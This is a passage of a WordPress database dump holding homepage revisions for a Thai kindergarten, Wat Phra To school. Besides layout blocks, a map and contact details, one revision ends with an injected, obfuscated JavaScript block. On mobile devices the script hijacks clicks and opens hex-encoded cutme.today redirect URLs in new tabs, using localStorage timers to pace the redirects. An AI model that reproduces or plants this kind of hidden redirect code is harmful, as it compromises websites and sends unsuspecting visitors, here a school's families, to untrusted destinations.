{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:49:54','2024-08-30 02:49:54','',19,'http://watprato.ssk.in.th/?p=287',0,'revision','',0),
(288,2,'2024-08-30 09:50:28','2024-08-30 02:50:28','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 